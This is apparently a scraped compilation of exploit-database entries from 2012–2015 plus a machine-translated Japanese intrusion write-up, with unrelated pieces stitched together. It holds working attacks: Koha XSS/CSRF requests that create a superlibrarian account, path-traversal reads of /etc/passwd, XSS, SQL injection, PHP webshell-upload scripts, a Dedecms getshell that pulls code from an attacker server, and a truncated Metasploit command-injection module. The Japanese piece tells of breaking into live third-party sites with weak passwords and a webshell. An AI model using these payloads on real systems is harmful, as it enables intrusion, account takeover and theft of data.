Bob, library admin, recognizes the new malicious list entry. He logs into the staff area and browses the public lists in order to delete the entry. Once he opens 

http://<staff-interface>/cgi-bin/koha/virtualshelves/shelves.pl

the malcious code get's executed. The code can then perform any unauthorized actions with the pemissions of user bob. For example:

Create new user:

http://testbox:9002/cgi-bin/koha/members/memberentry.pl?nodouble=&destination=&check_member=&borrowernumber=&nodouble=&title=&firstname=&othernames=&sex=&streetnumber=&streettype=&address2=&city=&state=&zipcode=&country=&phone=&phonepro=&mobile=&email=&emailpro=&fax=&B_address=&B_address2=&B_city=&B_state=&B_zipcode=&B_country=&B_phone=&B_email=&contactnote=&altcontactsurname=&altcontactfirstname=&altcontactaddress1=&altcontactaddress2=&altcontactaddress3=&altcontactstate=&altcontactzipcode=&altcontactcountry=&altcontactphone=&sort1=&sort2=&dateexpiry=&opacnote=&borrowernotes=&patron_attr_1=&BorrowerMandatoryField=surname%7Cdateofbirth%7Ccardnumber%7Caddress&category_type=A&updtype=I&op=insert&surname=hacker&dateofbirth=10%2F06%2F2000&address=fictional&select_city=%7C%7C%7C&cardnumber=9182734629182364&branchcode=MAURES&categorycode=P_COM&dateenrolled=24%2F06%2F2015&userid=hacker&password=hacker&password2=hacker&patron_attr_1_code=PROFESSION&setting_messaging_prefs=1&modify=yes&borrowernumber=&save=Save&setting_extended_patron_attributes=1

Give the new user superlibririan permission:

http://testbox:9002/testbox:9002/cgi-bin/koha/members/member-flags.pl?member=7855&newflags=1&flag=superlibrarian

The attacker can now log as superlibrarian.

Side Note: In order to make the attack work, alice needs to be logged in to the Open Public Catalog interface at the time of when clicking the malicious link.
Alice needs to have access to the OPAC interface and to have permissions to create public lists.
HireHackking 
# Exploit Title: Koha Open Source ILS - Path Traversal in STAFF client
# Google Dork:
# Date: 25/06/2015
# Exploit Author: Raschin Tavakoli, Bernhard Garn, Peter Aufner and Dimitris Simos - Combinatorial Security Testing Group of SBA Research (cst@sba-research.org)
# Vendor Homepage: koha-community.org
# Software Link: https://github.com/Koha-Community/Koha
# Version: 3.20.x <= 3.20.1, 3.18.x <= 3.18.8, 3.16.x <= 3.16.12
# Tested on: Debian Linux
# CVE : CVE-2015-4632



### CVE-2015-4632 ### 

#### Titel: ####
Directory traversal

#### Type of vulnerability: ####
File Path Traversal

##### Exploitation vector:
Injecting into the "template_path" parmeter in /cgi-bin/koha/svc/members/search and /cgi-bin/koha/svc/members/search

##### Attack outcome:
Read access to arbitrary files on the system

#### Impact: ####
{low,medium,high,critical}
high

#### Software/Product name: ####
Koha

#### Affected versions: ####
* <= Koha 3.20.1
* <= Koha 3.18.8 
* <= Koha 3.16.12

#### Fixed in version: ####
* version 3.20.1 http://koha-community.org/security-release-koha-3-20-1/,
* version 3.18.8 http://koha-community.org/security-release-koha-3-18-8/, 
* version 3.16.12 http://koha-community.org/security-release-koha-3-16-12/

#### Vendor: ####
http://koha-community.org/ (Open Source)

#### CVE number: ####
CVE-2015-4632

#### Timeline ####
* `2015-06-18` identification of vulnerability 
* `2015-06-18` 1st contact to release maintainer, immediate reply
* `2015-06-23` new release with fixed vulnerabilities

#### Credits: ####
RGhanad-Tavakoli@sba-research.org
---
Vulnerability Disclosure by Combinatorial Security Testing Group of SBA Research.
Contact: cst@sba-research.org

#### References:
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408
http://koha-community.org/security-release-koha-3-20-1/
http://koha-community.org/security-release-koha-3-18-8/
http://koha-community.org/security-release-koha-3-16-12/

#### Description: ####
Multiple directory traversal vulnerabilities allow remote attackers to read arbitrary files via a .. (dot dot) in (1) /cgi-bin/koha/svc/virtualshelves/search and (2) in /cgi-bin/koha/svc/members/search 

#### Proof-of-concept: ####
/cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

/cgi-bin/koha/svc/members/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
HireHackking 
Title:
===============
ManageEngine Asset Explorer v6.1 - XSS Vulnerability


CVE-ID:
====================================
CVE-2015-2169


CVSS:
====================================
3.5


Product & Service Introduction (Taken from their homepage):
====================================
ManageEngine AssetExplorer is a web-based IT Asset Management (ITAM)
software that helps you monitor and manage assets in your network from
Planning phase to Disposal phase. AssetExplorer provides you with a number
of ways to ensure discovery of all the assets in your network. You can
manage software & hardware assets, ensure software license compliance and
track purchase orders & contracts - the whole nine yards! AssetExplorer is
very easy to install and works right out of the box.

(Homepage: https://www.manageengine.com/products/asset-explorer/ )


Abstract Advisory Information:
==============================
Cross site scripting attack can be performed on the manage engine asset
explorer. If the 'publisher' name contains vulnerable script, it gets
executed in the browser.


Affected Products:
====================
Manage Engine
Product: Asset Explorer - Web Application 6.1.0 (Build 6112)


Severity Level:
====================
Medium


Technical Details & Description:
================================
Add a vendor with a script in it to the registry.
Login to the product,
Scan the endpoint where the registry is modified.
In the right pane, go to software->Scanned Software

The script gets executed.

Vulnerable Product(s):
ManageEngine Asset Explorer

Affected Version(s):
Version 6.1.0 / Build Number 6112
(Earlier versions i did not test)

Vulnerability Type(s):
Persistent Cross Site Scripting


PoC:
=======================
Add the following registry entry in the machine, for targeted attack.

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fake_Software]
"DisplayName"="A fake software 2 installed"
"UninstallString"="C:\\Program Files\\fake\\uninst.exe"
"DisplayVersion"="0.500.20"
"URLInfoAbout"="http://www.dummy.org"
"Publisher"="<script> alert(\"XSS\"); </script>"


Security Risk:
==================
Medium.


Credits & Authors:
==================
Suraj Krishnaswami (suraj.krishnaswami@gmail.com)


Timeline:
==================
Discovered at Wed, March 3, 2015
Informed manage engine about the vulnerability: March 4, 2015
Case moved to development team: March 4, 2015
Asked for updates: March 9, 2015
Asked for updates: March 13, 2015
Asked for updates: April 14, 2015
Public Disclosure at Mon, June 22, 2015
HireHackking 
#############################################################
#
# COMPASS SECURITY ADVISORY
# http://www.csnc.ch/en/downloads/advisories.html
#
#############################################################
#
# CVE ID :   CVE-2015-3443
# Product:   Secret Server [1]
# Vendor:   Thycotic
# Subject:   Stored Cross-Site Scripting Vulnerability (XSS)
# Risk:    High
# Effect:   Remotely exploitable
# Author:   Marco Delai (marco.delai@csnc.ch)
# Date:   June 24th 2015
#
#############################################################


Introduction:
-------------
Thycotic Secret Server enterprise password management software allows 
the creation, management and control of critical passwords in one 
centralized, web-based repository [1]. 

The identified vulnerability (stored Cross-Site Scripting) allows the 
execution of JavaScript code in the browser of a valid user when it 
toggle the password mask on a specially crafted password. This allows, 
for example, an attacker to prepare a specially crafted shared password, 
which when read by another user, can steal all other passwords the 
victim has access to. 


Vulnerable:
-----------
Secret Server customers on version 8.6.000000 to 8.8.000004 [2]. 


Technical Details
--------------------
Exploiting the vulnerability simply requires to:
1. Create a new password entry within Secret Server with the following
   value: "Compass Security<script>alert("Compass Security")</script>"
2. Open the basic dashboard and toggle the password mask. The password 
   is retrieved from the server using an AJAX call and its value is 
   added straight to the page's DOM without validation. Thus, the 
   script included in step 1 is executed. 

Note that the payload defined in step 1 did only get executed in the 
basic dashboard view. The advanced dashboard did adequately encode the
password. Extract of the vulnerable page: 

  GET
/SecretServer/api.ashx/simplehome/GetSecretItemValue?secretItemId=[...]&audi
tAction=unmask HTTP/1.1

  HTTP/1.1 200 OK
  Cache-Control: no-cache, no-store, must-revalidate
  Pragma: no-cache
  Content-Length: 62
  Content-Type: application/json; charset=utf-8
  Expires: -1
  [...]
  Content-Security-Policy: connect-src 'self'; font-src 'self';
frame-src 'self' sslauncher:; img-src 'self' data:; media-src 'self';
object-src 'self'; style-src 'self' 'unsafe-inline'; script-src 'self'
'unsafe-inline' 'unsafe-eval'
  X-Content-Security-Policy: connect-src 'self'; font-src 'self';
frame-src 'self' sslauncher:; img-src 'self' data:; media-src 'self';
object-src 'self'; style-src 'self' 'unsafe-inline'; script-src 'self'
'unsafe-inline' 'unsafe-eval'
  X-Content-Type-Options: nosniff
  X-XSS-Protection: 1; mode=block
  X-UA-Compatible: IE=edge
  
  "Compass Security<script>alert(\"Compass Security\")</script>"
  

Remediation:
------------
Update Secret Server to the latest version, which fixes the
vulnerability [2]. 


Milestones:
-----------
2015-02-19 Vulnerability discovered
2015-02-20 Vulnerability reported to vendor
2015-02-20 Vendor patch [2]
2015-06-24 Public disclosure


References:
-----------
[1] http://thycotic.com/products/secret-server/
[2]
http://thycotic.com/products/secret-server/resources/advisories/thy-ss-004/
HireHackking 
 ==========================
# Exploit Title: Dedecms variable coverage leads to getshell
# Date: 26-06-2015
# Vendor Homepage: http://www.dedecms.com/]
# Version: dedecms 5.7-sp1 and all old version
# CVE : CVE-2015-4553
===========================


[CVE-2015-4553]Dedecms variable coverage leads to getshell
#############################################################################
#
#   DBAPPSECURITY  LIMITED http://www.dbappsecurity.com.cn/
#
#############################################################################
#
# CVE ID:   CVE-2015-4553
# Subject:   Dedecms variable coverage leads to getshell
# Author:   zise
# Date:     06.17.2015
#############################################################################
Introduction:
========
dedecms Open source cms
Extensive application
 
Influence version 
Newest dedecms 5.7-sp1 and all old version


Remote getshell 
Details:
=======
After the default installation of dedecms
Installation directory
/install/index.php
or
/install/index.php.bak
 
/install/index.php //run iis apache exploit
/install/index.php.bak //run apache exploit


Code analysis

/install/index.php.bak?install_demo_name=aaaa&insLockfile=bbbb

#############################################################################
17 $install_demo_name = 'dedev57demo.txt';
18 $insLockfile = dirname(__FILE__).'/install_lock.txt';

here $install_demo_name and $insLockfile definition
// echo $install_demo_name;  printf dedev57demo.txt 

29 foreach(Array('_GET','_POST','_COOKIE') as $_request)
30 {
31    foreach($$_request as $_k => $_v) ${$_k} = RunMagicQuotes($_v);
32 }


// echo $install_demo_name; printf aaaa

$install_demo_name by variable coverage

The same
17 $install_demo_name = 'dedev57demo.txt';
18 $insLockfile = dirname(__FILE__).'/install_lock.txt';

variable coverage
#############################################################################



 
GETSHELL Step 1 Clear file contents config_update.php
#############################################################################
config_update.php
13 $updateHost = 'http://updatenew.dedecms.com/base-v57/';
14 $linkHost = 'http://flink.dedecms.com/server_url.php';

In order to obtain the webshell need to control $updateHost
So the use of variable coverags cleared config_update.php

 
http://192.168.204.135/install/index.php.bak
?step=11
&insLockfile=a
&s_lang=a
&install_demo_name=../data/admin/config_update.php

index.php.bak
373 else if($step==11)
374 {
375 require_once('../data/admin/config_update.php');
376 $rmurl = $updateHost."dedecms/demodata.{$s_lang}.txt";
377 
378 $sql_content = file_get_contents($rmurl);
379 $fp = fopen($install_demo_name,'w');
380 if(fwrite($fp,$sql_content))
381 echo '&nbsp; <font color="green">[√]</font> 存在(您可以选择安装进行体验)';
382 else
383 echo '&nbsp; <font color="red">[×]</font> 远程获取失败';
384 unset($sql_content);
385 fclose($fp);
386 exit();
387 }

###
HTTP/1.1 200 OK
Date: Wed, 17 Jun 2015 06:55:23 GMT
Server: Apache/2.4.12
X-Powered-By: PHP/5.6.6
Vary: User-Agent
Content-Length: 55
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
 
  <font color="red">[×]</font> 远程获取失败
 ###




###After execution file 0 byte ~ho~year~####
2015/06/17  14:55                 0 config_update.php
               1 file              0 byte


 
GETSHELL Step 2
#############################################################################
Create local HTTP services
 
zise:tmp zise$ ifconfig en0
en0: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
inet 119.253.3.18 netmask 0xffffff00 broadcast  
 
zise:tmp zise$ mkdir "dedecms"
zise:tmp zise$ cd dedecms/
zise:dedecms zise$ echo "<?php phpinfo();?>" > demodata.a.txt
zise:dedecms zise$ cd ../
zise:tmp zise$ python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
192.168.204.135 - - [17/Jun/2015 15:11:18] "GET /dedecms/demodata.a.txt HTTP/1.0" 200 -
 
 
####
http://192.168.204.135/install/index.php.bak
?step=11
&insLockfile=a
&s_lang=a
&install_demo_name=hello.php
&updateHost=http://119.253.3.18:8000/

####
 
HTTP/1.1 200 OK
Date: Wed, 17 Jun 2015 07:11:18 GMT
Server: Apache/2.4.12
X-Powered-By: PHP/5.6.6
Vary: Accept-Encoding,User-Agent
Content-Length: 81
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
 
  <font color="green">[√]</font> 存在(您可以选择安装进行体验)


index.php.bak
373 else if($step==11)
374 {
375 require_once('../data/admin/config_update.php');
376 $rmurl = $updateHost."dedecms/demodata.{$s_lang}.txt";
377 
378 $sql_content = file_get_contents($rmurl);
379 $fp = fopen($install_demo_name,'w');
380 if(fwrite($fp,$sql_content))  //fwrite websehll
381 echo '&nbsp; <font color="green">[√]</font> 存在(您可以选择安装进行体验)';
382 else
383 echo '&nbsp; <font color="red">[×]</font> 远程获取失败';
384 unset($sql_content);
385 fclose($fp);
386 exit();
387 }
 
Attack complete
you webshell
 
http://192.168.204.135/install/hello.php



> zise ^_^
> Security researcher

This is the vulnerability of some web pages
http://seclists.org/fulldisclosure/2015/Jun/47
HireHackking 
source: https://www.securityfocus.com/bid/54042/info

The JCal Pro Calendar component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/index.php?option=com_jcalpro&Itemid=1 [SQL Injection]
HireHackking 
source: https://www.securityfocus.com/bid/54045/info

Multiple Webify products are prone to multiple HTML-injection and local file-include vulnerabilities because they fail to properly sanitize user-supplied input.

Exploiting these issues could allow an attacker to execute arbitrary HTML and script code in the context of the affected browser, steal cookie-based authentication credentials, and execute arbitrary local scripts in the context of the web server process. Other attacks are also possible.

The following Webify products are vulnerable:

Webify eDownloads Cart
Webify eDownloads
Webify Project Manager
Webify Blog 

Local file include:

http://www.example.com/index.php?page=[LOCAL FILE INCLUDE]

http://www.example.com/admin/index.php?page=[LOCAL FILE INCLUDE]

HTML injection:

http://www.example.com/admin/index.php?page=query [Persistent Script Code Inject via Query Value]

http://www.example.com/admin/index.php?page=addobjects [Persistent Script Code Inject via addObject name Value]

http://www.example.com/admin/index.php?page=formdesigner [Persistent Script Code Inject via former label Value]

http://www.example.com/admin/index.php?page=comments [Persistent Script Code Inject via Comment text & name Value]

http://www.example.com/admin/index.php?page=submissions [Persistent Script Code Inject via submission name Value]
HireHackking 
source: https://www.securityfocus.com/bid/54052/info

Multiple Themes for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.

An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.

WordPress Famous theme 2.0.5 and WordPress Deep Blue theme 1.9.2 are vulnerable. 

<?php

$uploadfile="lo.php";
 
$ch = curl_init("http://www.example.com/wordpress/wp-content/themes/deep-blue/megaframe/megapanel/inc/upload.php?folder=/wordpress/wp-content/themes/deep-blue/megaframe/megapanel/inc/&fileext=php");
curl_setopt($ch, CURLOPT_POST, true);   
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

<?php

$uploadfile="lo.php";
 
$ch = curl_init("http://www.example.com/wordpress/wp-content/themes/famous/megaframe/megapanel/inc/upload.php?folder=/wordpress/wp-content/themes/famous/megaframe/megapanel/inc/&;fileext=php");
curl_setopt($ch, CURLOPT_POST, true);   
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>
HireHackking 
source: https://www.securityfocus.com/bid/54049/info

Squiz CMS is prone to multiple cross-site scripting vulnerabilities and an XML external entity injection vulnerability because it fails to properly sanitize user-supplied input.

Attackers may exploit these issues to execute arbitrary code in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials, to perform XML based attacks (including local file disclosure), TCP port scans, and a denial of service (DoS) condition; other attacks are also possible.

Squiz CMS 4.6.3 is vulnerable; other versions may also be affected. 

http://www.example.com/_admin/?SQ_BACKEND_PAGE=main&backend_section=am&am_section=edit_asset"><script>alert(document.cookie)</script>&assetid=73&sq_asset_path=%2C1%2C73&sq_link_path=%2C0%2C74&asset_ei_screen=details [XSS]
HireHackking 
source: https://www.securityfocus.com/bid/54057/info

LB Mixed Slideshow plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.

An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.

LB Mixed Slideshow 1.0 is vulnerable; other versions may also be affected. 

PostShell.php
<?php

$uploadfile="lo.php.gif";
 
$ch = curl_init("http://www.exemple.com/wordpress/wp-content/plugins/lb-mixed-slideshow/libs/uploadify/upload.php?element_name=images&gid=1");
curl_setopt($ch, CURLOPT_POST, true);   
curl_setopt($ch, CURLOPT_POSTFIELDS, array('images'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

Shell Access : http://www.example.com/wordpress/wp-content/plugins/lb-mixed-slideshow/gallery/1/lo.php.gif

lo.php.gif
<?php
phpinfo();
?>
HireHackking 
source: https://www.securityfocus.com/bid/54058/info

Wp-ImageZoom for WordPress is prone to a remote file-disclosure vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to view local files in the context of the web server process, which may aid in further attacks.

Wp-ImageZoom 1.0.3 is vulnerable; other versions may also be affected. 

http://www.example.com/wordpress/wp-content/plugins/wp-imagezoom/download.php?file=../../../../../../../etc/passwd
HireHackking 
source: https://www.securityfocus.com/bid/54066/info

VANA CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

 http://www.example.com/general/index.php?recordID=125'
HireHackking 
source: https://www.securityfocus.com/bid/54075/info

Mobility System Software is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Mobility System Software versions prior to 7.6.3 and 7.7.1 are vulnerable. 

https://www.example.com/aaa/wba_login.html?wbaredirect=wba-dnserror&9f45dâ?><script>alert(1)</script>22whatever=1
HireHackking

0x01はじめに

いつか何もすることがなかったので、FOFAのXXシステムを検索し、運を試してみることを考えていました。

1049983-20220119225612527-1364655911.jpg

0x02テストプロセス

ウェブサイトを選んで開きました

1049983-20220119225613163-1439267662.jpgEM…、あなたの運を試してください、バックハンド管理者が入力してください、それは管理システムです

1049983-20220119225613562-313120700.jpg次に、ウェブサイトの機能ポイントに従って、ランダムにいくつかをクリックして、通常の操作以外のものがないことがわかりました。しばらく検索した後、ファイルのダウンロード操作があることがわかりました。

1049983-20220119225613876-1349432502.jpg

いい男、それは非常に深く隠されています。私はパッケージをキャッチし、要求された住所を見ました。ファイルのようです

1049983-20220119225614402-159575045.jpgFILENAMEが./etc/passwdに変更されます。

1049983-20220119225614938-1294885574.jpgこのパスはそうではないようです。それから私はそれを一つ一つ試してみました.//など。到着したら、アクセスできます。

1049983-20220119225615472-1186122569.jpg歴史的なコマンドを読むことができるかどうかを見てみましょう。履歴コマンドを読むことができる場合は、WebサイトのバックアップファイルまたはWebサイトインストールパッケージがあるかどうかを確認できます。 hehe、 /root/.bash_historyへのパスを変更してください、アクセス! ….500エラー

1049983-20220119225615994-2012918871.jpg許可は不十分であるようです。他の場所から始める方法はありません。

次に、F12のWebサイトソースコードを確認し、ソースコードの象徴的なステートメントまたはファイルを使用して、同じシステムを検索できます。おそらくこのようなルート許可があるかもしれません

1049983-20220119225616528-1337144661.jpg同じシステムを使用した後、パスワードをもう一度試してみてください

1049983-20220119225616920-100761018.jpg最近幸運があり、弱いパスワードが再び入力されました。ちょっとハイ

1049983-20220119225617369-1237355266.jpg次に操作を今すぐ試してみてください。

1049983-20220119225617822-1470359648.jpg History Command /root/.bash.historyを読んでみてください

1049983-20220119225618270-857525528.jpg歴史的なコマンドを読んで、ゆっくりと反転することができます。最後に、Webサイトソースコードがあることがわかります。

1049983-20220119225618653-1742935129.jpgバックハンドでダウンロードしてください

1049983-20220119225618998-757262743.jpg減圧

1049983-20220119225619315-1947083995.jpg 1049983-20220119225619680-1165688496.jpgJSPのウェブサイト、私はJavaを学んでクラックしたことがありません。私は最初に歴史的なコマンドで環境を構築したので、サーバーに同じシステムを展開しました。

私はJavaを学んでいませんが、自動化されたJava監査ツールは引き続き充電されているため、1つの方法を使用して手動で行うだけです。

1049983-20220119225620165-708289661.jpg 1日のほとんどを探した後、私はほとんどあきらめたかった.

ただし、このシステムにはMySQLがあります。最初にデータの構造を見てみましょう。おそらくこれは見えます

1049983-20220119225620586-481103708.jpg次に、管理Webサイトユーザーのテーブルにシステムに付属のアカウントを見つけました(ここでアカウントXで表されます)。アカウントXは、管理者権限よりも高いです。

1049983-20220119225621169-770288268.jpgパスワードをCMD5に入力して確認します

1049983-20220119225621575-1976315723.jpgお金が欲しいですか?私はたくさんの貧しい人々で、お金がありません。私は良いマスターを探して、それをチェックします。良いマスターは非常に速く、私はメッセージに答えました。

1049983-20220119225621999-891368438.jpgその後、このアカウントXを使用して、構築したシステムにログインし、このアカウントがWebサイトに存在することがわからないことがわかりました。つまり、開発者によって残される可能性があります。 Hehe、このアカウントでは、他のシステムがログインできます。

次に、システムにファイルをアップロードするためのアップロードポイントがあることがわかりました。それらはすべて白いボックスにあるので、リアルタイムファイル監視ツールを展開して、変更されたファイルを確認するか、後でアップロードするファイルがアップロードされたかどうかを確認できます。

ここでは、ファイルを監視するために使用されます

1049983-20220119225622414-783233812.jpgファイルをアップロードし、パッケージをつかみ、suffix.jspを変更します

1049983-20220119225622849-1570156655.jpgは、アップロードが失敗したとプロンプトします

1049983-20220119225623276-2048107424.jpgファイルの監視を確認すると、アップロードできます

1049983-20220119225623680-1104630029.jpg接尾辞は制御可能ですが、ファイル名は制御できず、面倒です。一般に、ファイル名はタイムスタンプまたは特定のアルゴリズムにちなんで命名されます。さらに数回アップロードすると、定期的ではないようです。

1049983-20220119225624147-1308714869.jpgダウンロードされたWebサイトソースコードのクラスファイルを見てください。要求されたアドレスを見てください

Imageは、アップロードクラスのアップロードファイルメソッドである必要があります(Javaを学んでいない、それが正しいかどうかわからない、批判しないでください〜)

UploadFileメソッドを見つけて、1つずつ見ました。私はめまいがしましたが、最終的にファイル名を生成する方法を見つけました= - =

1049983-20220119225625149-1811091206.jpg uuid.randomuid()。toString()が何であるかを見てみましょう

1049983-20220119225625633-667069781.jpg 3つの部分:現在の日付と時刻+クロックシーケンス +グローバルに一意のIEEEマシン識別番号(ネットワークカードMACアドレス)

突然、私はそれについて考え、最初の2つを取得する方法を見つけることができましたが、最後のネットワークカードのMACアドレスは非常に困難です。ファイルのダウンロードは、ネットワークカードのMACアドレスでダウンロードすることはできず、別の道路がブロックされています。

数時間後、別のアップロードポイントを見つけました

1049983-20220119225626147-800504049.jpgファイル監視

1049983-20220119225626548-1854421406.jpg馬への直接送信

1049983-20220119225627041-1428346929.jpgアドレスをエコーしました

1049983-20220119225627401-450524635.jpg Ice Scorpionは正常に接続されています

1049983-20220119225627845-114544922.jpg最後に、システムのアカウントを使用してシステムにログインし、2番目のアップロードポイントを使用して馬をアップロードします。

1049983-20220119225628330-1035735350.jpg

0x03要約

1。FOFAを介してオープンソースのCMSシステムを検索し、ターゲットサイトをクリックし、弱いパスワード管理者/管理者2を入力してシステムを入力します。読む././etc/passwd and ././etc/passwdと両方の500エラー、/././tc/passwdはコンテンツを読むことができます。次に、/./././root/.bash_historyに変更します。エラーは500。4です。このテストのターゲットWebサイトは履歴レコードを読み取ることができません。次に、FOFAを介して他のいくつかの同様のオープンソースCMSシステムを検索し、同じ弱いパスワード管理者/管理者を入力してシステムに入り、/./././root/. bash_historyコンテンツを正常に読むこともできます。ターゲットサイトをバックアップし、Webサイトのルートディレクトリに保存する圧縮パッケージの名前を含む、ターゲット管理者の操作の記録を表示します。 5.ルートディレクトリのソースコード圧縮パッケージをローカルエリアに直接ダウンロードして、コード監査を実行できます。 6.ターゲットソースコードには、Webサイト構成ファイルとMySQLデータベースのバックアップファイルが含まれていることがわかりました。 7。環境をローカルに構築することにより、ターゲットシステムは通常、ローカルで実行できます。同時に、Filemonitor(https://github.com/thekingofduck/filemonitor)を介したファイルの変更を監視し、phpmyadminを介してデータベースを管理します。システム独自のアカウントシステムと対応するパスワードハッシュ値はデータベーステーブルにあり、MD5を介して正常に復号化され、システムアカウントを介してローカル環境システムバックエンドにログインします。 8。バックグラウンドのファイルアップロードサイトに、ファイルアップロードの脆弱性があります。 Test.jspのアップロードは成功するように求められます。ただし、Filemonitorの監視は、新しいファイルが確立されていることを示しています。アップロードされたファイル名は検索されていませんが、アップロードされていないことが証明されています。 9.ソースコードでアップロードキーワードを検索することにより、アップロード後の成功したファイル名のルールは次のことを知ることができます。 A.JSPは正常にアップロードでき、アップロードされたファイル名が返されます。ファイル名を検索して、保存されたパスを知る。 12。最後に、システム所有のアカウントシステムを使用してターゲットシステムの背景にログインし、2番目の場所を使用して馬をアップロードします。オリジナルリンク: https://mp.weixin.qqc.com/s?__biz=mzg4ntuwmzm1ng==mid=2247493857Idx=1Sn=F7DB570914D9E4B4F517AB05B5E5D380KKKKSM=CFA54CF 2F8D2C5E41B2636BB3E6A996161617324182A2DD93B52A1FA3BEA9DD42D8ED96B37777BCENE=178CUR_ALBUM_ID=15533862517775492098#RD

HireHackking 
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Endian Firewall < 3.0.0 Proxy Password Change Command Injection',
      'Description' => %q{
        This module exploits an OS command injection vulnerability in a 
        web-accessible CGI script used to change passwords for locally-defined
        proxy user accounts. Valid credentials for such an account are 
        required.
        Command execution will be in the context of the "nobody" account, but 
        on versions of EFW I tested, this account had broad sudo permissions, 
        including to run the script /usr/local/bin/chrootpasswd as root. This 
        script changes the password for the Linux root account on the system 
        to the value specified by console input once it is executed.
        The password for the proxy user account specified will *not* be 
        changed by the use of this module, as long as the target system is 
        vulnerable to the exploit.
        Very early versions of Endian Firewall (e.g. 1.1 RC5) require
        HTTP basic auth credentials as well to exploit this vulnerability.
        Use the standard USERNAME and PASSWORD advanced options to specify
        these values if required.
        Versions >= 3.0.0 still contain the vulnerable code, but it appears to 
        never be executed due to a bug in the vulnerable CGI script which also
        prevents normal use.
        Tested successfully against the following versions of EFW Community:
        1.1 RC5, 2.0, 2.1, 2.5.1, 2.5.2.
	Used Apache mod_cgi Bash Environment Variable Code Injection 
	and Novell ZENworks Configuration Management Remote Execution
	modules	as templates.
      },
      'Author' => [
	'Ben Lincoln' # Vulnerability discovery, exploit, Metasploit module
      ],
      'References' => [
#        ['CVE', ''],
#        ['OSVDB', ''],
#        ['EDB', ''],
        ['URL', 'http://jira.endian.com/browse/COMMUNITY-136']
      ],
      'Privileged'  => false,
      'Platform'    => %w{ linux },
      'Payload'        =>
        {
          'BadChars' => "\x00\x0a\x0d",
          'DisableNops' => true,
          'Space'       => 2048
        },
      'Targets'        =>
        [
          [ 'Linux x86',
            {
              'Platform'        => 'linux',
              'Arch'            => ARCH_X86,
              'CmdStagerFlavor' => [ :echo, :printf ]
            }
          ],
          [ 'Linux x86_64',
            {
              'Platform'        => 'linux',
              'Arch'            => ARCH_X86_64,
              'CmdStagerFlavor' => [ :echo, :printf ]
            }
          ]
        ],
      'DefaultOptions' =>
        {
          'SSL' => true,
          'RPORT' => 10443
        },
      'DefaultTarget' => 0,
      'DisclosureDate' => 'Jun 28 2015',
      'License' => MSF_LICENSE
    ))

    register_options([
      OptString.new('TARGETURI', [true, 'Path to chpasswd.cgi CGI script', 
        '/cgi-bin/chpasswd.cgi']),
      OptString.new('EFW_USERNAME', [true, 
        'Valid proxy account username for the target system']),
      OptString.new('EFW_PASSWORD', [true, 
        'Valid password for the proxy user account']),
      OptInt.new('CMD_MAX_LENGTH', [true, 'CMD max line length', 200]),
      OptString.new('RPATH', [true, 
        'Target PATH for binaries used by the CmdStager', '/bin']),
      OptInt.new('TIMEOUT', [true, 'HTTP read response timeout (seconds)', 10])
     ], self.class)
  end

  def exploit
    # Cannot use generic/shell_reverse_tcp inside an elf
    # Checking before proceeds
    if generate_payload_exe.blank?
      fail_with(Failure::BadConfig, 
        "#{peer} - Failed to store payload inside executable, " + 
        "please select a native payload")
    end

    execute_cmdstager(:linemax => datastore['CMD_MAX_LENGTH'], 
      :nodelete => true)
  end

  def execute_command(cmd, opts)
    cmd.gsub!('chmod', "#{datastore['RPATH']}/chmod")

    req(cmd)
  end

  def req(cmd)
    sploit = "#{datastore['EFW_PASSWORD']}; #{cmd};"

    boundary = "----#{rand_text_alpha(34)}"
    data = "--#{boundary}\r\n"
    data << "Content-Disposition: form-data; name=\"ACTION\"\r\n\r\n"
    data << "change\r\n"
